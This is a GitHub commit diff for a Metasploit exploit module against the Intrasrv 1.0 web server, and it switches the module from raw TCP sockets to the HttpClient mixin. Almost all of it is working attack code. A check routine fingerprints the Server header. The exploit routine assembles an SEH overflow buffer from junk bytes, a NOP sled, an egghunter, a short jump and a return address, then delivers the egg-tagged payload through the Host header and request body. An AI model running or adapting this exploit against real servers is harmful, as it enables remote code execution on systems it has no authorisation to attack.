Skip to content

Commit a35d548

Browse files
committed
Use HttpClient
1 parent 185ef2e commit a35d548

File tree

1 file changed

+17
-22
lines changed

1 file changed

+17
-22
lines changed

modules/exploits/windows/http/intrasrv_bof.rb

Lines changed: 17 additions & 22 deletions
Original file line numberDiff line numberDiff line change
@@ -10,7 +10,7 @@
1010
class Metasploit3 < Msf::Exploit::Remote
1111
Rank = NormalRanking
1212

13-
include Msf::Exploit::Remote::Tcp
13+
include Msf::Exploit::Remote::HttpClient
1414
include Msf::Exploit::Egghunter
1515

1616
def initialize(info={})
@@ -57,24 +57,15 @@ def initialize(info={})
5757
'Privileged' => false,
5858
'DisclosureDate' => "May 30 2013",
5959
'DefaultTarget' => 0))
60-
61-
register_options(
62-
[
63-
OptPort.new('RPORT', [true, 'The remote port', 80])
64-
], self.class)
6560
end
6661

6762
def check
68-
begin
69-
connect
70-
rescue
71-
print_error("Could not connect to target!")
72-
return Exploit::CheckCode::Safe
73-
end
74-
sock.put("GET / HTTP/1.0\r\n")
75-
res = sock.get
63+
res = send_request_cgi({
64+
'method' => 'GET',
65+
'uri' => "/"
66+
})
7667

77-
if res and res =~ /intrasrv 1.0/
68+
if res and res.headers['Server'] =~ /intrasrv 1.0/
7869
return Exploit::CheckCode::Vulnerable
7970
else
8071
return Exploit::CheckCode::Safe
@@ -88,19 +79,23 @@ def exploit
8879
})
8980

9081
# setup buffer
91-
buf = rand_text_alpha(target['Offset']-128) # junk to egghunter
82+
buf = rand_text(target['Offset']-128) # junk to egghunter
9283
buf << make_nops(8) + hunter # nopsled + egghunter at offset-128
93-
buf << rand_text_alpha(target['Offset']-buf.length) # more junk to offset
84+
buf << rand_text(target['Offset']-buf.length) # more junk to offset
9485
buf << "\xeb\x80\x90\x90" # nseh - jmp -128 to egghunter
9586
buf << [target.ret].pack("V*") # seh
9687

97-
# attach egg tag to payload
98-
shellcode = egg + egg
88+
# Setup payload
89+
shellcode = rand_text(1) # align payload
90+
shellcode = egg + egg # attach egg tags
9991
shellcode << payload.encoded
10092

10193
print_status("Sending buffer...")
102-
connect
103-
sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{shellcode}")
104-
disconnect
94+
send_request_cgi({
95+
'method' => 'GET',
96+
'uri' => "/",
97+
'vhost' => buf,
98+
'data' => shellcode
99+
})
105100
end
106101
end

0 commit comments

Comments
 (0)